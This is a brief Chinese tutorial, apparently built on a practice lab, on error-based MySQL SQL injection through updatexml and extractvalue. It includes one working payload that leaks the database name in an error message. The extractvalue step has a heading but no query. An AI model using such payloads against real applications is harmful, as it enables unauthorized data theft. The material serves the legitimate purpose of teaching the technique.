首先介绍两个函数
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串)
一、查询数据库名称
show databases;
二、选择数据库security
use security;
三、显示数据库中的表
show tables;
四、查询users表中数据
select * from users;
五、用函数updatexml注入,获取数据库名称
mysql> select * from users where id=1 and updatexml(2,concat(0x3D,database(),0x3
D),2);
六、用函数extractvalue注入,获取当前用户
禁止非法,后果自负
欢迎关注公众号:web安全工具库
